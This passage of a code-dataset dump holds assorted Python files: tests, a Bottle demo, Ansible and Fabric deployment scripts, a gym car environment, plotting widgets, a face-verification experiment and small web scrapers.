\"fill-in\",\n \"data\": {\"text\": {}},\n \"evaluation\": {\"inputs\": [{\"regex\": \"d+\"}, {\"regex\": \"e+\"}]},\n }\n\n result = self.Format.validate(task)\n self.assertTrue(result[\"correct\"])\n\n def test_validate_malformed_regex(self):\n task = {\n \"format_type\": \"fill-in\",\n \"data\": {\"text\": {}},\n \"evaluation\": {\"inputs\": [{\"regex\": \"d+(\"}, {\"regex\": \"e+\"}]},\n }\n\n result = self.Format.validate(task)\n self.assertFalse(result[\"correct\"])\n\n def test_evaluate_correct(self):\n evaluation = {\"inputs\": [{\"regex\": \"d+\"}, {\"regex\": \"e+\"}]}\n\n solution = {\"values\": {\"0\": \"ddd\", \"1\": \"eee\"}}\n\n result = self.Format.evaluate(evaluation, solution, None)\n self.assertTrue(result[\"correct\"])\n\n def test_evaluate_incorrect(self):\n evaluation = {\"inputs\": [{\"regex\": \"d+\"}, {\"regex\": \"e+\"}]}\n\n solution = {\"values\": {\"0\": \"ddd\", \"1\": \"ccc\"}}\n\n result = self.Format.evaluate(evaluation, solution, None)\n self.assertFalse(result[\"correct\"])\n\n def test_evaluate_no_solution(self):\n evaluation = {\"inputs\": [{\"regex\": \"d+\"}, {\"regex\": \"e+\"}]}\n\n result = self.Format.evaluate(evaluation, None, None)\n self.assertFalse(result[\"correct\"])\n","sub_path":"tests/api/v1/formats/test_fill_in.py","file_name":"test_fill_in.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"440323335","text":"# _*_ coding:utf-8 _*_\n\n# モジュールのインポート\nfrom bottle import route,run,template\n\n\n\n\n# 
Get the headers\nfrom bottle import request  # 'request' is used below but was missing from the imports\n\n@route('/show_header')\ndef show_header():\n # Display the header information\n header_list = [\"<li>%s = %s</li>\" % (k,v) for k,v in request.headers.items()]\n return \"\".join(header_list)\n\n# Get the cookie\n@route('/show_cookie')\ndef show_cookie():\n # Display the cookie\n count = request.cookies.get('count')\n return template('count={{count}}',count=count)\n\n\n\n# Start the built-in development server\nif __name__=='__main__':\n run(host='localhost',port=8080,debug=True,reloader=True)\n","sub_path":"HTTPmethod.py","file_name":"HTTPmethod.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"172145650","text":"# pdb is inbuilt python debugger\n\na = input()\nb = input()\n\nbreakpoint()\n\ndef sum_the_values(a,b):\n print(\"we are inside this function\")\n print(int(a)+int(b))\n\n\nsum_the_values(a,b)\n\n# pdb console appears whenever it sees a breakpoint().\n# c(continue) => continue all the leftover code after breakpoint.\n# n(next) => runs the very next piece of code.\n# s(step inside) => to step inside a function such that enter will work like showing us next line executing instead\n# of normal donothing behaviour\n# we can use print to know values of the variables at a stage in pdb\n# we can also know the datatype by using \"whatis\"","sub_path":"Python Advance/W07D02/pdb_working.py","file_name":"pdb_working.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"489835546","text":"# command line example:\n\nimport sys\n\n\nfrom setup_utils import parse_command_line, configure_python_paths\nfrom os.path import join\n\n# -------------------------------processing command line\nif len(sys.argv)>2:\n\n args = parse_command_line()\n\n\nelse: # emulate command line\n command_line_emulation_argument_list = ['--subject','R1075J',\n '--experiment','PS2',\n '--workspace-dir','/Users/m/scratch/auto_tracker',\n '--mount-point','/Users/m',\n '--python-path','/Users/m/RAM_UTILS_GIT',\n '--python-path','/Users/m/PTSA_NEW_GIT']\n\n args = parse_command_line(command_line_emulation_argument_list)\n\nconfigure_python_paths(args.python_path)\n\n# ------------------------------- end of processing command line\n\n\nimport numpy as np\n\nfrom ReportUtils import ReportPipeline\n# from RamPipeline import RamPipeline\n#\n# from RamPipeline.DependencyChangeTrackerLegacy import DependencyChangeTrackerLegacy\n\nfrom FREventPreparation import FREventPreparation\nfrom JSONStubPreparation import JSONStubPreparation\n\n\n# turn it into command line options\n\nclass Params(object):\n def __init__(self):\n self.width = 5\n\n self.fr1_start_time = 0.0\n self.fr1_end_time = 1.366\n self.fr1_buf = 1.365\n\n self.control_start_time = -1.1\n self.control_end_time = -0.1\n self.control_buf = 1.0\n\n self.ps_start_time = -1.0\n self.ps_end_time = 0.0\n self.ps_buf = 1.0\n self.ps_offset = 0.1\n\n self.filt_order = 4\n\n self.freqs = np.logspace(np.log10(3), np.log10(180), 8)\n\n self.log_powers = True\n\n self.penalty_type = 'l2'\n self.C = 7.2e-4\n\n self.n_perm = 200\n\n self.include_fr1 = True\n self.include_catfr1 = True\n\n\nparams = Params()\n\n\n# class ReportPipeline(RamPipeline):\n# def __init__(self, subject, experiment, workspace_dir, mount_point=None):\n# RamPipeline.__init__(self)\n# self.subject = subject\n# #self.task = 'RAM_FR1'\n# self.experiment = experiment\n# self.mount_point = mount_point\n# self.set_workspace_dir(workspace_dir)\n# dependency_tracker = DependencyChangeTrackerLegacy(subject=subject, workspace_dir=workspace_dir, mount_point=mount_point)\n#\n# 
self.set_dependency_tracker(dependency_tracker=dependency_tracker)\n\n\n\n# sets up processing pipeline\nreport_pipeline = ReportPipeline(subject=args.subject, experiment=args.experiment,\n workspace_dir=join(args.workspace_dir,args.subject), mount_point=args.mount_point)\n\n\n\n\nreport_pipeline.add_task(JSONStubPreparation(params=params, mark_as_completed=True))\nreport_pipeline.add_task(FREventPreparation(params=params, mark_as_completed=True))\n\n# starts processing pipeline\nreport_pipeline.execute_pipeline()\n","sub_path":"tests/auto_tracker/auto_tracker.py","file_name":"auto_tracker.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"609461590","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Filename: ndrobot\n# @Date: 2019-06-25-09-09\n# @Author: Hany Abdulsamad\n# @Contact: hany@robot-learning.de\n\nimport gym\nfrom gym import spaces\nfrom gym.utils import seeding\n\nimport autograd.numpy as np\n\n\nclass Car(gym.Env):\n\n def __init__(self):\n self.nb_xdim = 4\n self.nb_bdim = 4\n self.nb_udim = 2\n self.nb_zdim = 2\n\n self._dt = 0.5\n self._g = np.array([0., 0., 0., 0.])\n\n # car length\n self._l = 0.1\n\n # belief cost weights\n self._bw = np.array([1., 1., 1., 1.])\n self._vw = np.array([1., 1., 1., 1.])\n # action cost weights\n self._uw = np.array([1., 1.])\n\n self._xmax = np.array([np.inf, np.inf, np.inf, np.inf])\n self._zmax = np.array([np.inf, np.inf, np.inf, np.inf])\n self._umax = np.array([np.inf, np.inf])\n\n self._state_space = spaces.Box(low=-self._xmax,\n high=self._xmax)\n\n self.action_space = spaces.Box(low=-self._umax,\n high=self._umax)\n\n self.observation_space = spaces.Box(low=-self._xmax,\n high=self._xmax)\n\n self.seed()\n self.reset()\n\n @property\n def state_space(self):\n return self._state_space\n\n @property\n def xlim(self):\n return self._xmax\n\n @property\n def ulim(self):\n return self._umax\n\n @property\n def dt(self):\n return self._dt\n\n @property\n def goal(self):\n return self._g\n\n def init(self):\n # initial belief\n _b0 = np.array([2., 2., 0., 0.])\n _sigma_b0 = 1. * np.eye(self.nb_bdim)\n return _b0, _sigma_b0\n\n def dynamics(self, x, u):\n # x, y, th, v\n xn = x + self._dt * np.array([x[3] * np.cos(x[2]),\n x[3] * np.sin(x[2]),\n x[3] * np.tan(u[1]) / self._l,\n u[0]])\n return xn\n\n def dyn_noise(self, x=None, u=None):\n return 1.e-4 * np.eye(self.nb_xdim)\n\n def observe(self, x):\n return np.array([x[0], x[1]])\n\n def obs_noise(self, x=None):\n _sigma = 1.e-4 * np.eye(self.nb_zdim)\n _sigma += np.array([[0.5 * (5. - x[0])**2, 0.],\n [0., 0.]])\n return _sigma\n\n # cost defined over belief\n def cost(self, mu_b, sigma_b, u, a):\n if a:\n return (mu_b - self._g).T @ np.diag(100. * self._bw) @ (mu_b - self._g) +\\\n np.trace(np.diag(100. 
* self._vw) @ sigma_b)\n else:\n return u.T @ np.diag(self._uw) @ u + np.trace(np.diag(self._vw) @ sigma_b)\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def step(self, u):\n # state-action dependent dynamics noise\n _sigma_dyn = self.dyn_noise(self.state, u)\n # evolve deterministic dynamics\n self.state = self.dynamics(self.state, u)\n # add dynamics noise\n self.state = self.np_random.multivariate_normal(mean=self.state, cov=_sigma_dyn)\n\n # state-dependent observation noise\n _sigma_obs = self.obs_noise(self.state)\n # observe state\n _z = self.observe(self.state)\n # add observation noise\n _z = self.np_random.multivariate_normal(mean=_z, cov=_sigma_obs)\n return _z, [], False, {}\n\n def reset(self):\n self.state = np.array([0., 4., 0., 0.])\n return self.observe(self.state)\n","sub_path":"trajopt/envs/car/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"528561852","text":"#Program to illustrate writelines() method\r\n#for writing list into the file\r\n\r\nf =open(\"test4.txt\",'w')\r\nlist =[\"Computer Science\\n\",\"Physics\\n\",\"Chemistry\\n\",\"Maths\"]\r\nf.writelines(list)\r\nprint(\"List of lines written to the file successfully\")\r\nf.close()\r\n\r\n\r\n","sub_path":"prog_file10.py","file_name":"prog_file10.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"275046565","text":"# coding=utf-8\nimport json\n\nfrom ansible.executor.playbook_executor import PlaybookExecutor\nfrom ansible.inventory.manager import InventoryManager\nfrom ansible.parsing.dataloader import DataLoader\nfrom ansible.plugins.callback import CallbackBase\nfrom ansible.vars.manager import VariableManager\nfrom collections import namedtuple\nfrom ansible.executor.task_queue_manager import TaskQueueManager\nfrom collections import OrderedDict\nfrom src.script.options import options\n\n\n# noinspection PyProtectedMember\nclass PlaybookCallback(CallbackBase):\n\n def __init__(self):\n super(PlaybookCallback, self).__init__()\n self.host_ok = {}\n self.host_unreachable = {}\n self.host_failed = {}\n\n def playbook_on_start(self):\n # runs first\n pass\n\n def playbook_on_stats(self, stats):\n # called at the end, whether the run succeeded or failed\n print('stats', type(stats))\n\n def v2_runner_on_failed(self, result, ignore_errors=False):\n # also called here when an async task fails\n name = result._host.get_name()\n if name not in self.host_failed:\n self.host_failed[name] = OrderedDict()\n self.host_failed[name][result.task_name] = result._result\n\n def v2_runner_on_ok(self, result):\n \"\"\"\n result: TaskResult\n _host:\n _task: Task\n _result: dict\n _task_field\n task_name: Unicode\n 1. After a task times out, execution does not continue and there is no rc in the result; rc is 0 when the task succeeds. The timeout applies to the current step.\n 2. name only shows the step name, not the include name\n 3. With multiple hosts, if any single host fails mid-run, the run fails for all of them\n \"\"\"\n name = result._host.get_name()\n if name not in self.host_ok:\n self.host_ok[name] = OrderedDict()\n self.host_ok[name][result.task_name] = result._result\n\n def v2_runner_on_unreachable(self, result):\n\n name = result._host.get_name()\n if name not in self.host_unreachable:\n self.host_unreachable[name] = OrderedDict()\n self.host_unreachable[name][result.task_name] = result._result\n\n\n# noinspection PyProtectedMember\ndef main():\n loader = DataLoader()\n # sources is a list of hosts files\n inv = InventoryManager(loader=loader, sources=['../../ansible_etc/hosts'])\n variable_manager = VariableManager(loader=loader, inventory=inv)\n # playbooks, inventory, variable_manager, loader, options, passwords\n playbook = PlaybookExecutor(playbooks=['../../ansible_etc/test.yml'], inventory=inv,\n variable_manager=variable_manager, loader=loader, options=options, passwords=dict())\n callback = PlaybookCallback()\n playbook._tqm._stdout_callback = callback\n playbook.run()\n print(callback.host_ok)\n print(json.dumps(callback.host_ok, indent=2))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/script/playbool_executor.py","file_name":"playbool_executor.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"270393873","text":"import asyncio\nimport time\nimport timeit\nfrom datetime import timedelta, datetime\n\nimport aiohttp\nfrom bs4 import BeautifulSoup\n\nfrom chunkator import chunkator\n\nfrom apps.githubs.models import GithubUser\nfrom utils.slack import slack_update_1day_1commit\n\n\nasync def check_1day_1commit(github_user: GithubUser):\n \"\"\"\n Update the 1-day-1-commit streak by crawling\n \"\"\"\n async with aiohttp.ClientSession() as session:\n async with session.get(f'https://github.com/{github_user.username}') as res:\n source = await res.text()\n soup = BeautifulSoup(source, \"lxml\") # lxml is said to be faster than html.parser\n count = 0\n\n now = datetime.now() - timedelta(days=1)\n for rect in reversed(soup.select('rect')):\n # check from the day before the update day\n if not rect.get('data-date') or \\\n now.date() < datetime.strptime(rect.get('data-date'), '%Y-%m-%d').date():\n continue\n\n if not rect.get('data-count') or rect.get('data-count') == '0':\n break\n\n count += 1\n\n #print(f'{github_user.username}: {count}')\n github_user.continuous_commit_day = count\n github_user.save(update_fields=['continuous_commit_day'])\n time.sleep(0.1) # sleep briefly because of 429 (rate limit) errors\n\n\ndef update_1day_1commit(github_user_id: int = None):\n async def update_1day_1commit_futures(user_id: int = None):\n github_users = GithubUser.objects.filter(id=user_id) if user_id else GithubUser.objects.all()\n\n if not github_users:\n return\n\n futures = [\n asyncio.ensure_future(check_1day_1commit(github_user)) for github_user in chunkator(github_users, 1000)\n ]\n\n await asyncio.gather(*futures)\n\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(update_1day_1commit_futures(github_user_id))\n\n\ndef run():\n start_time = timeit.default_timer() # record the start time\n slack_update_1day_1commit(status='start🌱', message='')\n\n update_1day_1commit()\n\n terminate_time = timeit.default_timer() # record the end time\n slack_update_1day_1commit(\n status='done🌿',\n message=f'Updating the 1-day-1-commit counts took {terminate_time - start_time:.2f} seconds.😎',\n 
)\n","sub_path":"opgc/scripts/update_1day_1commit.py","file_name":"update_1day_1commit.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"456436602","text":"from fabric.api import *\nfrom fabric.contrib import files\n\nenv.use_ssh_config = True\n\ndef setup_nanomsg():\n RELEASE = 'nanomsg-0.4-beta'\n TARBALL = '%s.tar.gz' % RELEASE\n if not files.exists(TARBALL):\n run('wget http://download.nanomsg.org/%s' % TARBALL)\n run('tar xf %s' % TARBALL)\n with cd(RELEASE):\n run('./configure')\n run('make')\n sudo('make install')\n sudo('ldconfig')\n\n\ndef setup_nanomsg_python():\n REPO_NAME = 'nanomsg-python'\n HASH = '742d39a520230da373552fd0f1858feefc623b15'\n REPO_URL = 'https://github.com/tonysimpson/nanomsg-python.git'\n if not files.exists(REPO_NAME):\n run('git clone %s' % REPO_URL)\n with cd(REPO_NAME):\n run('git checkout %s' % HASH)\n sudo('python setup.py install')\n\n\ndef setup():\n setup_nanomsg()\n setup_nanomsg_python()\n sudo('pip install chan')\n\n\ndef deploy():\n run('hostname')\n sudo('/etc/init.d/traffic stop', pty=False)\n put('traffic.py')\n put('lights.py')\n put('run.sh')\n put('init-%s' % env.host_string, '/etc/init.d/traffic', use_sudo=True)\n sudo('chown root:root /etc/init.d/traffic')\n sudo('update-rc.d traffic defaults')\n sudo('chmod 755 /etc/init.d/traffic')\n sudo('/etc/init.d/traffic start', pty=False)\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"632999032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2 f�vr. 2015\n@author: Odile\n\ngui.plots\n\"\"\"\nfrom PyQt4 import QtGui\nfrom matplotlib.backends.backend_qt4 import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as Canvas\nfrom matplotlib.figure import Figure\n\nfrom gui.plots_qt import Ui_TabWidget_Plots\n\nimport numpy as np\n\n\nclass PlotsGUI(QtGui.QTabWidget):\n\n \"\"\"\n classdocs\n \"\"\"\n\n def __init__(self, parent=None):\n \"\"\"\n Constructor\n \"\"\"\n super(PlotsGUI, self).__init__(parent)\n self.ui = Ui_TabWidget_Plots()\n self.ui.setupUi(self)\n\n def setup(self, analysis):\n self.ana = analysis\n self.__connect_events()\n self.__setup_plots()\n\n def __setup_plots(self):\n # Signal\n self.mpl_sig = MatplotlibWidget(\n title='Signal', xlabel='n/a', ylabel='n/a', dpi=70)\n self.mpl_sig.setObjectName(\"matplotlibwidget_Signal\")\n self.ui.verticalLayout.addWidget(self.mpl_sig)\n navigation = NavigationToolbar(self.mpl_sig, self)\n self.ui.verticalLayout.addWidget(navigation)\n # Frequency spectrum\n self.mpl_spec = MatplotlibWidget(\n title='Spectrum', xlabel='n/a', ylabel='n/a', dpi=70)\n self.mpl_spec.setObjectName(\"matplotlibwidget_Spectrum\")\n self.ui.verticalLayout_2.addWidget(self.mpl_spec)\n navigation = NavigationToolbar(self.mpl_spec, self)\n self.ui.verticalLayout_2.addWidget(navigation)\n # Mass spectrum\n self.mpl_mass = MatplotlibWidget(\n title='Mass', xlabel='n/a', ylabel='n/a', dpi=70)\n self.mpl_mass.setObjectName(\"matplotlibwidget_Mass\")\n self.ui.verticalLayout_3.addWidget(self.mpl_mass)\n navigation = NavigationToolbar(self.mpl_mass, self)\n self.ui.verticalLayout_3.addWidget(navigation)\n # Mass spectrum\n self.mpl_peaks = MatplotlibWidget(\n title='Peaks', xlabel='n/a', ylabel='n/a', dpi=70)\n self.mpl_peaks.setObjectName(\"matplotlibwidget_Peaks\")\n 
self.ui.verticalLayout_4.addWidget(self.mpl_peaks)\n navigation = NavigationToolbar(self.mpl_peaks, self)\n self.ui.verticalLayout_4.addWidget(navigation)\n # default tab = signal\n self.setCurrentIndex(0)\n\n def __connect_events(self):\n self.ana.plotSigRaisedSignal.connect(self.update_signal)\n self.ana.plotSpecRaisedSignal.connect(self.update_spectrum)\n self.ana.plotMassRaisedSignal.connect(self.update_mass)\n self.ana.plotPeaksRaisedSignal.connect(self.update_peaks)\n\n def update_signal(self, shortname, y, step, start, end):\n title = shortname + \" - signal - \" + \\\n \"(\" + str(start) + \", \" + str(end) + \")\"\n x = np.arange(len(y)) * step * 1e3 # in ms\n self.mpl_sig.plot_data(x, y, title, \"time (ms)\", \"a.u.\")\n\n def update_spectrum(self, shortname, y, freq):\n title = shortname + \" - frequency spectrum\"\n x = freq / 1e3 # in kHz\n self.mpl_spec.plot_data(x, y, title, \"Freq. (kHz)\", \"a.u.\")\n\n def update_mass(self, shortname, y, mass, ref, cyclo, mag, hold):\n title = shortname + \" - mass spectrum - \" + \\\n \"(\" + str(ref) + \", \" + str(cyclo) + \", \" + str(mag) + \")\"\n x = mass\n self.mpl_mass.plot_mass(x, y, title, \"Mass (u)\", \"a.u.\", hold)\n\n def update_peaks(self, shortname, y, mass, ind, mph, mpd, x1, x2, hold):\n title = shortname + \" - mass spectrum - \" + \\\n \"(mph=\" + str(mph) + \", mpd=\" + str(mpd) + \")\"\n x = mass\n self.mpl_peaks.plot_peaks(\n x, y, ind, title, \"Mass (u)\", \"a.u.\", x1, x2, hold)\n\n\nclass MatplotlibWidget(Canvas):\n\n def __init__(self, parent=None, title='Title', xlabel='x label', ylabel='y label', dpi=100):\n super(MatplotlibWidget, self).__init__(Figure())\n\n self.setParent(parent)\n self.figure = Figure(dpi=dpi)\n self.canvas = Canvas(self.figure)\n self.ax = self.figure.add_subplot(111)\n self.ax.hold(False)\n\n self.ax.set_title(title)\n self.ax.set_xlabel(xlabel)\n self.ax.set_ylabel(ylabel)\n\n def plot_data(self, x, y, title, xlabel, ylabel):\n self.ax.plot(x, y)\n self.ax.set_title(title)\n self.ax.set_xlabel(xlabel)\n self.ax.set_ylabel(ylabel)\n self.draw()\n\n def plot_mass(self, x, y, title, xlabel, ylabel, hold=False):\n self.ax.hold(hold)\n self.ax.plot(x, y)\n self.ax.set_title(title)\n self.ax.set_xlabel(xlabel)\n self.ax.set_ylabel(ylabel)\n self.draw()\n\n def plot_peaks(self, x, y, ind, title, xlabel, ylabel, x1=-1.0, x2=-1.0, hold=False):\n min_x = x1\n max_x = x2\n # dummy plot to apply the hold=True command\n self.ax.hold(False)\n self.ax.plot(x, y)\n self.draw()\n # real plot\n self.ax.hold(True)\n# self.ax.plot(x, y)\n self.ax.plot(x, y, 'b')\n self.ax.plot(x[ind], y[ind], '+', mfc=None, mec='r', mew=2, ms=8)\n self.ax.set_title(title)\n self.ax.set_xlabel(xlabel)\n self.ax.set_ylabel(ylabel)\n [x1, x2, y1, y2] = self.ax.axis()\n if min_x < 0.0:\n min_x = x1\n if max_x < 0.0:\n max_x = x2\n self.ax.axis([min_x, max_x, y1, y2])\n # test annotations\n x = x[ind]\n y = y[ind]\n for i, j in zip(x, y):\n text = \"{:.3f}\".format(float(j)) + \" (\" + \\\n \"{:.4f}\".format(float(i)) + \")\"\n# self.ax.annotate(\"{:.3f}\".format(float(j)), xy=(i, j), size=10)\n self.ax.annotate(text, xy=(i, j), xytext=(i, j), size=10)\n self.draw()\n","sub_path":"src/gui/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":5696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"227269172","text":"# code testing\n\n# Add project path to sys\nimport sys\nsys.path.append(\"./././\")\n\n# Import lib\nimport os\nimport pandas as pd\nimport 
numpy as np\nfrom sklearn import preprocessing\n\n# Import my own lib\nimport others.utilities as my_util\nfrom algorithms.paired_distance_alg import paired_distance_alg\n\n#############################################################################################\n\n# Experiment name\nexp = 'exp_11'\nexp_name = exp + '_alg_GenderEuclidean' # _alg_BaselineEuclidean _alg_GenderEuclidean\nquery_exp_name = exp_name\nexp_name = exp_name + 'OneThreshold'\n\ntrain_class_idx = [3, 4, 5] # [0, 1, 2, 3, 4, 5] [0, 1, 2] [3, 4, 5]\ntrain_class = np.array(['female-asian', 'female-black', 'female-caucasian', 'male-asian', 'male-black', 'male-caucasian'])\ntrain_class = list(train_class[train_class_idx])\ntrain_class_name = '-'\nquery_exp_name = query_exp_name + '_' + train_class_name.join(train_class)\n\ndataset_name = 'Diveface'\ndataset_exacted = 'resnet50'\n\n# Whole run round settings\nrun_exp_round = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] # define randomseed as list\ntest_size = 0.3\nvalid_size = 0.1\n\n# k-fold for training\nnumb_train_kfold = 1\ncv_run = -1 # -1 = run all fold, else, run only define\n\n# Algorithm parameters\n# param_grid = {'distanceFunc':'euclidean'}\n# combine_rule = 'concatenate'\n\npos_class = 'POS'\n\n#############################################################################################\n\n# Path\n# Dataset path\ndataset_path = my_util.get_path(additional_path=['.', '.', 'mount', 'FaceRecognitionPython_data_store', 'Dataset', 'Diveface'])\nexp_query_path = my_util.get_path(additional_path=['.', '.', 'mount','FaceRecognitionPython_data_store', 'Result', 'exp_result', exp, query_exp_name])\n\n#############################################################################################\n\n# Run experiment\nfor exp_numb in run_exp_round:\n # Load data\n if 'BaselineEuclidean' in exp_name:\n my_data = pd.read_csv((dataset_path + dataset_name + '_' + dataset_exacted + '_nonorm' + '.txt'), sep=\" \", header=0)\n else:\n dataset_exacted_model = ''\n if 'GenderEuclidean' in exp_name:\n dataset_exacted_model = ['exp_8', 'eer'] # exp_7 for race, exp_8 for gender\n else:\n dataset_exacted_model = ['exp_7', 'eer'] # exp_7 for race, exp_8 for gender\n my_data = pd.read_csv((dataset_path + dataset_name + '_' + dataset_exacted + '_' + dataset_exacted_model[0] + '_run_' + str(0) + '(' + dataset_exacted_model[1] + ').txt'), sep=\" \", header=0)\n # Separate data\n my_data_race = (my_data['gender'] + '-' + my_data['ethnicity']).values\n [training_sep_idx, test_sep_idx, valid_sep_idx] = my_util.split_data_by_id_and_classes(my_data.id.values, my_data_race, test_size=test_size, valid_size=valid_size, random_state=exp_numb)\n \n # Assign idx\n tmp_training_sep_idx = np.empty(0)\n tmp_valid_sep_idx = np.empty(0)\n tmp_test_sep_idx = np.empty(0)\n for train_class_idx in train_class:\n tmp_training_sep_idx = np.append(tmp_training_sep_idx, training_sep_idx[my_data_race[training_sep_idx] == train_class_idx])\n tmp_valid_sep_idx = np.append(tmp_valid_sep_idx, valid_sep_idx[my_data_race[valid_sep_idx] == train_class_idx])\n tmp_test_sep_idx = np.append(tmp_test_sep_idx, test_sep_idx[my_data_race[test_sep_idx] == train_class_idx])\n \n # Train data\n training_sep_idx = tmp_training_sep_idx.astype(int)\n x_training = my_data.iloc[training_sep_idx,8:].values\n y_race_training = my_data_race[training_sep_idx]\n y_class_training = my_data.id.iloc[training_sep_idx].values\n y_id_training = my_data.data_id.iloc[training_sep_idx].values\n # Valid data\n valid_sep_idx = tmp_valid_sep_idx.astype(int)\n x_valid 
= my_data.iloc[valid_sep_idx,8:].values\n y_race_valid = my_data_race[valid_sep_idx]\n y_class_valid = my_data.id.iloc[valid_sep_idx].values\n y_id_valid = my_data.data_id.iloc[valid_sep_idx].values\n # Test data\n test_sep_idx = tmp_test_sep_idx.astype(int)\n x_test = my_data.iloc[test_sep_idx,8:].values\n y_race_test = my_data_race[test_sep_idx]\n y_class_test = my_data.id.iloc[test_sep_idx].values\n y_id_test = my_data.data_id.iloc[test_sep_idx].values\n del my_data, my_data_race\n \n if 'BaselineEuclidean' in exp_name:\n x_training = preprocessing.normalize(x_training, norm='l2', axis=1, copy=True, return_norm=False)\n x_valid = preprocessing.normalize(x_valid, norm='l2', axis=1, copy=True, return_norm=False)\n x_test = preprocessing.normalize(x_test, norm='l2', axis=1, copy=True, return_norm=False)\n \n feature_size = x_training.shape[1]\n unique_class = {'pos':'POS', 'neg':'NEG'}\n \n # Initial model\n distance_model = paired_distance_alg()\n \n # Load model\n model = my_util.load_numpy_file(exp_query_path + query_exp_name + '_run_' + str(exp_numb) + '.npy')\n best_param = model['kernel_param']\n \n # Construct triplet training dataset\n triplet_paired_list = my_util.triplet_loss_paring(y_id_training, y_class_training, randomseed=exp_numb)\n [combined_training_xx, combined_training_yy, combined_training_id] = my_util.combination_rule_paired_list(x_training, y_id_training, triplet_paired_list, combine_rule=model['combine_rule'])\n \n label_classes = np.unique(combined_training_yy)\n \n for race_idx in train_class:\n save_exp_name = exp_name + '_' + race_idx\n # Result path\n exp_result_path = my_util.get_path(additional_path=['.', '.', 'mount','FaceRecognitionPython_data_store', 'Result', 'exp_result', exp, save_exp_name])\n # Make directory\n my_util.make_directory(exp_result_path)\n # Experiment name each seed\n exp_name_seed = save_exp_name + '_run_' + str(exp_numb)\n \n sep_idx = y_race_test == race_idx\n # Construct triplet test dataset\n triplet_paired_list = my_util.triplet_loss_paring(y_id_test[sep_idx], y_class_test[sep_idx], randomseed=exp_numb)\n [combined_test_xx, combined_test_yy, combined_test_id] = my_util.combination_rule_paired_list(x_test[sep_idx,:], y_id_test[sep_idx], triplet_paired_list, combine_rule=model['combine_rule'])\n \n predictedScores, predictedY, _ = distance_model.predict(combined_test_xx[:,0:feature_size], combined_test_xx[:,feature_size:], combined_test_yy, unique_class, model['kernel_param'], distance_metric=model['distanceFunc'])\n \n # Eval performance\n # Performance metrics\n performance_metric = my_util.classification_performance_metric(combined_test_yy, predictedY, np.array(['NEG', 'POS']))\n # Biometric metrics\n performance_metric.update(my_util.biometric_metric(combined_test_yy, np.ravel(predictedScores), pos_class, score_order='ascending', threshold_step=0.01))\n\n # Save score\n exp_result = {'distanceFunc':model['distanceFunc'], 'kernel_param':model['kernel_param'], 'combine_rule':model['combine_rule'], 'randomseed': exp_numb, 'label_classes': label_classes, 'algorithm':model['algorithm'], 'experiment_name': save_exp_name, 'trueY':combined_test_yy, 'predictedScores':predictedScores, 'predictedY':predictedY, 'test_image_id':combined_test_id, 'dataset_name':dataset_name}\n exp_result.update(performance_metric)\n my_util.save_numpy(exp_result, exp_result_path, exp_name_seed)\n\n print('Finished ' + exp_name_seed)\n\n del performance_metric\n del predictedScores, predictedY\n del combined_test_xx, combined_test_yy, combined_test_id\n del 
exp_result\n\n    del best_param, label_classes\n    del combined_training_xx, combined_training_yy, combined_training_id\n\nprint()\n","sub_path":"run_experiments/exp_11/exp_11_alg_EuclideanOneThreshold.py","file_name":"exp_11_alg_EuclideanOneThreshold.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"247108855","text":"import requests\nfrom bs4 import BeautifulSoup\n\nfor page_number in range(1, 6):\n    data = requests.get(\"https://series.naver.com/ebook/top100List.nhn?page=\"+str(page_number))\n    result = BeautifulSoup(data.text, \"html.parser\")\n    list_book = result.select(\"div.lst_thum_wrap li\")\n    for book in list_book:\n        name = book.select_one(\"a strong\").text\n        writer = book.select_one(\"span.writer\").text\n        print(name, writer)\n\n","sub_path":"WEEK3_HW1.py","file_name":"WEEK3_HW1.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
